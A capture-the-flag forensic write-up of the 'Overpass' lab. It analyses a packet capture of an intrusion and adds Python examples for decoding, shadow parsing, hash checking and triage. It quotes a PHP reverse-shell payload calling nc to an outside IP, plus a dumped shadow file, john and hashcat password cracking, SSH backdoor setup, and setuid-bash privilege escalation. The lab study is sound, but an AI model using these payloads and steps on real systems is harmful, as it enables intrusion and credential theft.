***wireshark***
What was the URL of the page they used to upload a reverse shell?
apply the http display filter and look at the requested URIs -> /development/
What payload did the attacker use to gain access?
Follow TCP Stream on stream 1 -> <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
***following tcp stream 3***
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@overpass-production:/var/www/html/development/uploads$ ls -lAh
ls -lAh
total 8.0K
-rw-r--r-- 1 www-data www-data 51 Jul 21 17:48 .overpass
-rw-r--r-- 1 www-data www-data 99 Jul 21 20:34 payload.php
www-data@overpass-production:/var/www/html/development/uploads$ cat .overpass
cat .overpass
,LQ?2>6QiQ$JDE6>Q[QA2DDQiQH96?6G6C?@E62CE:?DE2?EQN.www-data@overpass-production:/var/www/html/development/uploads$ su james
su james
Password: whenevernoteartinstant
james@overpass-production:/var/www/html/development/uploads$ cd ~
cd ~
james@overpass-production:~$ sudo -l]
sudo -l]
sudo: invalid option -- ']'
usage: sudo -h | -K | -k | -V
usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user]
[command]
usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p
prompt] [-T timeout] [-u user] [VAR=value] [-i|-s] [<command>]
usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p
prompt] [-T timeout] [-u user] file ...
james@overpass-production:~$ sudo -l
sudo -l
[sudo] password for james: whenevernoteartinstant
Matching Defaults entries for james on overpass-production:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on overpass-production:
(ALL : ALL) ALL
james@overpass-production:~$ sudo cat /etc/shadow
sudo cat /etc/shadow
root:*:18295:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
sshd:*:18464:0:99999:7:::
james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
james@overpass-production:~$ git clone https://github.com/NinjaJc01/ssh-backdoor
<git clone https://github.com/NinjaJc01/ssh-backdoor
Cloning into 'ssh-backdoor'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 5% (1/18)
remote: Counting objects: 11% (2/18)
remote: Counting objects: 16% (3/18)
remote: Counting objects: 22% (4/18)
remote: Counting objects: 27% (5/18)
remote: Counting objects: 33% (6/18)
remote: Counting objects: 38% (7/18)
remote: Counting objects: 44% (8/18)
remote: Counting objects: 50% (9/18)
remote: Counting objects: 55% (10/18)
remote: Counting objects: 61% (11/18)
remote: Counting objects: 66% (12/18)
remote: Counting objects: 72% (13/18)
remote: Counting objects: 77% (14/18)
remote: Counting objects: 83% (15/18)
remote: Counting objects: 88% (16/18)
remote: Counting objects: 94% (17/18)
remote: Counting objects: 100% (18/18)
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 6% (1/15)
remote: Compressing objects: 13% (2/15)
remote: Compressing objects: 20% (3/15)
remote: Compressing objects: 26% (4/15)
remote: Compressing objects: 33% (5/15)
remote: Compressing objects: 40% (6/15)
remote: Compressing objects: 46% (7/15)
remote: Compressing objects: 53% (8/15)
remote: Compressing objects: 60% (9/15)
remote: Compressing objects: 66% (10/15)
remote: Compressing objects: 73% (11/15)
remote: Compressing objects: 80% (12/15)
remote: Compressing objects: 86% (13/15)
remote: Compressing objects: 93% (14/15)
remote: Compressing objects: 100% (15/15)
remote: Compressing objects: 100% (15/15), done.
Unpacking objects: 5% (1/18)
Unpacking objects: 11% (2/18)
Unpacking objects: 16% (3/18)
Unpacking objects: 22% (4/18)
Unpacking objects: 27% (5/18)
Unpacking objects: 33% (6/18)
Unpacking objects: 38% (7/18)
remote: Total 18 (delta 4), reused 7 (delta 1), pack-reused 0
Unpacking objects: 44% (8/18)
Unpacking objects: 50% (9/18)
Unpacking objects: 55% (10/18)
Unpacking objects: 61% (11/18)
Unpacking objects: 66% (12/18)
Unpacking objects: 72% (13/18)
Unpacking objects: 77% (14/18)
Unpacking objects: 83% (15/18)
Unpacking objects: 88% (16/18)
Unpacking objects: 94% (17/18)
Unpacking objects: 100% (18/18)
Unpacking objects: 100% (18/18), done.
james@overpass-production:~$ cd ssh-backdoor
cd ssh-backdoor
james@overpass-production:~/ssh-backdoor$ ssh-keygen
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/james/.ssh/id_rsa): id_rsa
id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in id_rsa.
Your public key has been saved in id_rsa.pub.
The key fingerprint is:
SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58 james@overpass-production
The key's randomart image is:
+---[RSA 2048]----+
| .. . |
| . + |
| o .=. |
| . o o+. |
| + S +. |
| =.o %. |
| ..*.% =. |
| .+.X+*.+ |
| .oo=++=Eo. |
+----[SHA256]-----+
james@overpass-production:~/ssh-backdoor$ chmod +x backdoor
chmod +x backdoor
james@overpass-production:~/ssh-backdoor$ ./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
<9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
SSH - 2020/07/21 20:36:56 Started SSH backdoor on 0.0.0.0:2222
What password did the attacker use to privesc? -> whenevernoteartinstant
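The password came from the `.overpass` file the attacker read in stream 3. The page does not name the encoding; it is ROT47, and the decoder below (an added example, not code from the room or the writeup) confirms that by turning the 51 captured bytes into the JSON credential store whose `pass` field is exactly the password typed at `su james`. The only input is the `cat .overpass` output copied from the transcript.

```python
import json

# Constructed from the transcript above: the 51 bytes that `cat .overpass`
# printed in /var/www/html/development/uploads (the shell prompt that followed
# on the same line is not part of the file).
OVERPASS_RAW = ',LQ?2>6QiQ$JDE6>Q[QA2DDQiQH96?6G6C?@E62CE:?DE2?EQN.'


def rot47(text: str) -> str:
    """Rotate every printable ASCII character (0x21..0x7E) by 47 positions.

    ROT47 is an involution: applying it twice returns the input, so this one
    function both encodes and decodes. Other characters pass through unchanged.
    """
    out = []
    for ch in text:
        code = ord(ch)
        if 33 <= code <= 126:
            out.append(chr(33 + (code - 33 + 47) % 94))
        else:
            out.append(ch)
    return ''.join(out)


def recover_credentials(raw: str) -> list:
    """Decode an Overpass credential store and return its [{name, pass}] entries.

    The decode is only trusted if the result parses as the JSON list layout the
    store uses; anything else raises ValueError instead of returning garbage.
    """
    decoded = rot47(raw)
    try:
        entries = json.loads(decoded)
    except json.JSONDecodeError as exc:
        raise ValueError(f'ROT47 decode is not JSON: {decoded!r}') from exc
    if not isinstance(entries, list) or not all(
        isinstance(e, dict) and {'name', 'pass'} <= set(e) for e in entries
    ):
        raise ValueError('unexpected credential store layout')
    return entries


if __name__ == '__main__':
    for entry in recover_credentials(OVERPASS_RAW):
        print(f"{entry['name']}: {entry['pass']}")
```

The JSON check matters in incident work: a ROT47 pass over arbitrary bytes always "succeeds", so the structural check is what tells you the guess about the encoding was right.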
How did the attacker establish persistence? -> git clone https://github.com/NinjaJc01/ssh-backdoor
Using the fasttrack wordlist, how many of the system passwords were crackable? -> 4
save the shadow entries to shadow.txt and run john against them with fasttrack.txt
nano shadow.txt
root:*:18295:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
sshd:*:18464:0:99999:7:::
james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
┌──(kali㉿kali)-[~/Downloads]
└─$ john --wordlist=/usr/share/wordlists/fasttrack.txt shadow.txt
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
secret12 (bee)
abcd123 (szymex)
2g 0:00:00:01 DONE (2022-07-28 15:52) 1.941g/s 0p/s 646.6c/s 646.6C/s Spring2017..starwars
1qaz2wsx (muirland)
secuirty3 (paradox)
4g 0:00:00:01 DONE (2022-07-28 15:52) 2.547g/s 141.4p/s 707.0c/s 707.0C/s Spring2017..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
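Why john reports "Loaded 5 password hashes" out of 29 lines, and where its "iteration count is 5000" comes from, is visible in the shadow format itself. The parser below is an added example (not part of the writeup): it classifies each entry as locked, empty or hashed, pulls the algorithm, salt and round count out of the crypt(3) field, and converts the days-since-epoch "last changed" value to a date. The sample is copied from the `sudo cat /etc/shadow` output above with the run of locked system accounts trimmed.

```python
from datetime import date, timedelta

# Constructed sample: entries copied from the `sudo cat /etc/shadow` output
# above, with the long run of locked system accounts trimmed to three.
SHADOW_SAMPLE = """\
root:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
sshd:*:18464:0:99999:7:::
james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
"""

# crypt(3) hash identifiers as they appear at the start of the password field
ALGORITHMS = {'$1$': 'md5crypt', '$5$': 'sha256crypt', '$6$': 'sha512crypt',
              '$y$': 'yescrypt', '$2b$': 'bcrypt'}
EPOCH = date(1970, 1, 1)


def parse_shadow(text):
    """Parse shadow(5) lines into dicts an analyst can filter on.

    status is 'hashed' (a real crypt hash john/hashcat can load), 'locked'
    ('*', or anything starting with '!') or 'empty' (no password at all).
    For sha256crypt/sha512crypt the salt and round count are extracted; the
    round count defaults to 5000 when no 'rounds=' parameter is present.
    """
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(':')
        if len(fields) != 9:
            raise ValueError(f'malformed shadow line: {line!r}')
        user, pw, lastchg = fields[0], fields[1], fields[2]
        if pw == '':
            status = 'empty'
        elif pw == '*' or pw.startswith('!'):
            status = 'locked'
        else:
            status = 'hashed'
        algo = next((n for p, n in ALGORITHMS.items() if pw.startswith(p)), None)
        salt = rounds = None
        if algo in ('sha256crypt', 'sha512crypt'):
            parts = pw.split('$')          # ['', '6', [rounds=N,] salt, hash]
            if parts[2].startswith('rounds='):
                rounds, salt = int(parts[2][len('rounds='):]), parts[3]
            else:
                rounds, salt = 5000, parts[2]
        entries.append({
            'user': user, 'status': status, 'algorithm': algo,
            'salt': salt, 'rounds': rounds,
            'last_changed': EPOCH + timedelta(days=int(lastchg)) if lastchg else None,
        })
    return entries


def accounts_with_hashes(text):
    """Users whose entry carries a loadable hash: what 'Loaded N password hashes' counts."""
    return [e['user'] for e in parse_shadow(text) if e['status'] == 'hashed']


if __name__ == '__main__':
    for e in parse_shadow(SHADOW_SAMPLE):
        print(f"{e['user']:<10} {e['status']:<7} {e['algorithm'] or '-':<12} "
              f"rounds={e['rounds']} changed={e['last_changed']}")
    print('loadable hashes:', accounts_with_hashes(SHADOW_SAMPLE))
```

The five user accounts all changed their password on day 18464 (21 July 2020), the same day the attacker was on the box, which is the kind of detail worth noting alongside the four that fell to fasttrack.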
What's the default hash for the backdoor? -> bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3
┌──(kali㉿kali)-[~/Downloads/backdoors]
└─$ wget https://github.com/NinjaJc01/ssh-backdoor/raw/master/backdoor
--2022-07-28 15:56:32-- https://github.com/NinjaJc01/ssh-backdoor/raw/master/backdoor
Resolving github.com (github.com)... 140.82.113.3
Connecting to github.com (github.com)|140.82.113.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/NinjaJc01/ssh-backdoor/master/backdoor [following]
--2022-07-28 15:56:33-- https://raw.githubusercontent.com/NinjaJc01/ssh-backdoor/master/backdoor
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6634961 (6.3M) [application/octet-stream]
Saving to: ‘backdoor’
backdoor 100%[======================>] 6.33M 7.68MB/s in 0.8s
2022-07-28 15:56:35 (7.68 MB/s) - ‘backdoor’ saved [6634961/6634961]
┌──(kali㉿kali)-[~/Downloads/backdoors]
└─$ ls
1st 2nd 3rd 4th 5th backdoor birth shell.php
┌──(kali㉿kali)-[~/Downloads/backdoors]
└─$ chmod +x backdoor
┌──(kali㉿kali)-[~/Downloads/backdoors]
└─$ ./backdoor --help
backdoor
Flags:
--version Displays the program version string.
-h --help Displays help with available flag, subcommand, and positional value parameters.
-p --port Local port to listen for SSH on (default: 2222)
-i --interface IP address for the interface to listen on (default: 0.0.0.0)
-k --key Path to private key for SSH server (default: id_rsa)
-f --fingerprint SSH Fingerprint, excluding the SSH-2.0- prefix (default: OpenSSH_8.2p1 Debian-4)
-a --hash Hash for backdoor (default: bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3)
What's the hardcoded salt for the backdoor? -> 1c362db832f3f864c8c2fe05f2002a05
found in https://raw.githubusercontent.com/NinjaJc01/ssh-backdoor/master/main.go
func passwordHandler(_ ssh.Context, password string) bool {
return verifyPass(hash, "1c362db832f3f864c8c2fe05f2002a05", password)
}
What was the hash that the attacker used? - go back to the PCAP for this! -> 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
Crack the hash using rockyou and a cracking tool of your choice. What's the password? -> november16
func hashPassword(password string, salt string) string {
hash := sha512.Sum512([]byte(password + salt))
return fmt.Sprintf("%x", hash)
}
The salt (remember that the salt is hardcoded) is appended to the password, and SHA512 of the resulting string makes the hash. To summarize, we have:
SHA512(password + '1c362db832f3f864c8c2fe05f2002a05') = '6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed'
Now, let’s crack it with hashcat (we’ll use the mode 1710, which corresponds to sha512($pass.$salt)):
$ cat hash.txt
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05
$ hashcat --force -m 1710 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v5.1.0) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-4800MQ CPU @ 2.70GHz, 1024/3144 MB allocatable, 2MCU
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
* Uses-64-Bit
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=14 -D DGST_R1=15 -D DGST_R2=6 -D DGST_R3=7 -D DGST_ELEM=16 -D KERN_TYPE=1710 -D _unroll'
* Device #1: Kernel m01710_a0-pure.dcb403f5.kernel not found in cache! Building may take a while...
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05:november16
Session..........: hashcat
Status...........: Cracked
Hash.Type........: sha512($pass.$salt)
Hash.Target......: 6d05358f090eea56a238af02e47d44ee5489d234810ef624028...002a05
Time.Started.....: Sun Aug 16 18:44:00 2020 (2 secs)
Time.Estimated...: Sun Aug 16 18:44:02 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 149.3 kH/s (0.50ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 18432/14344385 (0.13%)
Rejected.........: 0/18432 (0.00%)
Restore.Point....: 16384/14344385 (0.11%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: christal -> tanika
Started: Sun Aug 16 18:43:44 2020
Stopped: Sun Aug 16 18:44:03 2020
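To show exactly what hashcat mode 1710 computed against the hash, here is a Python port of the backdoor's `hashPassword`/`verifyPass` logic (an added example, not the project's Go code or the writeup's). It recomputes hex(SHA-512(password || salt)) with the salt appended as literal ASCII text, checks the recovered password against the hash from the PCAP, and runs the same check over a small constructed candidate list standing in for rockyou.txt.

```python
import hashlib
import hmac

# Values from the page: the salt hardcoded in main.go and the hash the attacker
# passed to `./backdoor -a ...` in the captured session.
SALT = '1c362db832f3f864c8c2fe05f2002a05'
CAPTURED_HASH = ('6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3'
                 'e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed')

# Constructed stand-in for a wordlist; a real run would stream rockyou.txt.
CANDIDATES = ['password', 'Spring2017', 'starwars', 'november16', 'tanika']


def hash_password(password: str, salt: str = SALT) -> str:
    """Port of hashPassword() from main.go: hex(SHA-512(password || salt)).

    The salt is appended as its ASCII text, not decoded from hex; that is also
    why hashcat mode 1710 takes the salt as a plain string in hash:salt form.
    """
    return hashlib.sha512((password + salt).encode()).hexdigest()


def verify_pass(stored_hash: str, password: str, salt: str = SALT) -> bool:
    """Port of verifyPass(): constant-time comparison of the recomputed digest."""
    return hmac.compare_digest(hash_password(password, salt), stored_hash)


def search_wordlist(stored_hash: str, candidates, salt: str = SALT):
    """Return the first candidate whose sha512($pass.$salt) equals stored_hash, or None.

    This is all hashcat -m 1710 does, minus the speed: one unsalted-style
    SHA-512 per candidate, no iterations, one fixed salt for every guess.
    """
    for candidate in candidates:
        if verify_pass(stored_hash, candidate, salt):
            return candidate
    return None


if __name__ == '__main__':
    print(search_wordlist(CAPTURED_HASH, CANDIDATES))
```

The defensive point is the scheme itself: a single SHA-512 with a fixed, public salt gives no per-user salt and no work factor, so one pass over a wordlist at 149 kH/s on a laptop CPU (the speed hashcat reported above) settles it in seconds; sha512crypt's 5000 rounds on the same box, by contrast, ran at about 700 c/s in the john session.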
The attacker defaced the website. What message did they leave as a heading? -> H4ck3d by CooctusClan
What's the user flag? ->
┌──(kali㉿kali)-[~/Downloads/backdoors]
└─$ ssh -oHostKeyAlgorithms=+ssh-rsa james@10.10.216.199 -p 2222
The authenticity of host '[10.10.216.199]:2222 ([10.10.216.199]:2222)' can't be established.
RSA key fingerprint is SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.216.199]:2222' (RSA) to the list of known hosts.
james@10.10.216.199's password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
james@overpass-production:/home/james/ssh-backdoor$
james@overpass-production:/home/james/ssh-backdoor$ ls
README.md backdoor.service cooctus.png id_rsa.pub main.go
backdoor build.sh id_rsa index.html setup.sh
james@overpass-production:/home/james/ssh-backdoor$ cd ..
james@overpass-production:/home/james$ ls
ssh-backdoor user.txt www
james@overpass-production:/home/james$ cat user.txt
thm{d119b4fa8c497ddb0525f7ad200e6567}
james@overpass-production:/home/james$ ls -la
total 1136
drwxr-xr-x 7 james james 4096 Jul 22 2020 .
drwxr-xr-x 7 root root 4096 Jul 21 2020 ..
lrwxrwxrwx 1 james james 9 Jul 21 2020 .bash_history -> /dev/null
-rw-r--r-- 1 james james 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 james james 3771 Apr 4 2018 .bashrc
drwx------ 2 james james 4096 Jul 21 2020 .cache
drwx------ 3 james james 4096 Jul 21 2020 .gnupg
drwxrwxr-x 3 james james 4096 Jul 22 2020 .local
-rw------- 1 james james 51 Jul 21 2020 .overpass
-rw-r--r-- 1 james james 807 Apr 4 2018 .profile
-rw-r--r-- 1 james james 0 Jul 21 2020 .sudo_as_admin_successful
-rwsr-sr-x 1 root root 1113504 Jul 22 2020 .suid_bash
drwxrwxr-x 3 james james 4096 Jul 22 2020 ssh-backdoor
-rw-rw-r-- 1 james james 38 Jul 22 2020 user.txt
drwxrwxr-x 7 james james 4096 Jul 21 2020 www
james@overpass-production:/home/james$ ./.suid_bash
.suid_bash-4.4$ ls
ssh-backdoor user.txt www
.suid_bash-4.4$ cd root
.suid_bash: cd: root: No such file or directory
.suid_bash-4.4$ cd /root
.suid_bash: cd: /root: Permission denied
.suid_bash-4.4$ cat /root/root.txt
cat: /root/root.txt: Permission denied
.suid_bash-4.4$ ^C
.suid_bash-4.4$ bash
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
james@overpass-production:/home/james$ ./.suid_bash -p
.suid_bash-4.4# cat /root/root.txt
thm{d53b2684f169360bb9606c333873144d}
.suid_bash-4.4#
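Everything the attacker left in /home/james is visible in the `ls -la` output above: the history symlink to /dev/null, a setuid-root copy of bash, and the cloned backdoor repository. As an added example (not from the writeup), the triage function below parses `ls -l` rows and flags exactly those three indicators; the listing is copied from the session, and the set of known tooling directory names is an assumed list to extend.

```python
import re

# Constructed sample: the `ls -la` output of /home/james from the session above.
LISTING = """\
total 1136
drwxr-xr-x 7 james james 4096 Jul 22 2020 .
drwxr-xr-x 7 root root 4096 Jul 21 2020 ..
lrwxrwxrwx 1 james james 9 Jul 21 2020 .bash_history -> /dev/null
-rw-r--r-- 1 james james 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 james james 3771 Apr 4 2018 .bashrc
drwx------ 2 james james 4096 Jul 21 2020 .cache
drwx------ 3 james james 4096 Jul 21 2020 .gnupg
drwxrwxr-x 3 james james 4096 Jul 22 2020 .local
-rw------- 1 james james 51 Jul 21 2020 .overpass
-rw-r--r-- 1 james james 807 Apr 4 2018 .profile
-rw-r--r-- 1 james james 0 Jul 21 2020 .sudo_as_admin_successful
-rwsr-sr-x 1 root root 1113504 Jul 22 2020 .suid_bash
drwxrwxr-x 3 james james 4096 Jul 22 2020 ssh-backdoor
-rw-rw-r-- 1 james james 38 Jul 22 2020 user.txt
drwxrwxr-x 7 james james 4096 Jul 21 2020 www
"""

# One `ls -l` row: type+perms (optional ACL/SELinux marker), link count, owner,
# group, size, "Mon DD YYYY" or "Mon DD HH:MM", name (" -> target" for symlinks).
LS_ROW = re.compile(
    r'^(?P<mode>[-dlcbps][rwxsStT-]{9})[.+]?\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)'
    r'\s+(?P<size>\d+)\s+\S+\s+\d+\s+\S+\s+(?P<name>.+)$')

# Directory names of tooling seen in this session; assumed list, extend as needed.
KNOWN_TOOL_DIRS = {'ssh-backdoor'}


def triage_listing(text):
    """Return (name, reason) pairs for rows that warrant a second look."""
    findings = []
    for line in text.splitlines():
        m = LS_ROW.match(line)
        if not m:
            continue                      # 'total N' and anything unparseable
        mode, owner, group, name = m['mode'], m['owner'], m['group'], m['name']
        target = None
        if mode[0] == 'l' and ' -> ' in name:
            name, target = name.split(' -> ', 1)
        if name in ('.', '..'):
            continue
        if name.endswith('_history') and target == '/dev/null':
            findings.append((name, 'shell history redirected to /dev/null (anti-forensics)'))
        if mode[0] == '-' and mode[3] in 'sS' and owner == 'root':
            findings.append((name, 'setuid-root executable in a home directory'))
        elif mode[0] == '-' and mode[6] in 'sS' and group == 'root':
            findings.append((name, 'setgid-root executable in a home directory'))
        if mode[0] == 'd' and name in KNOWN_TOOL_DIRS:
            findings.append((name, 'checkout of a known backdoor/tooling repository'))
    return findings


if __name__ == '__main__':
    for name, reason in triage_listing(LISTING):
        print(f'{name}: {reason}')
```

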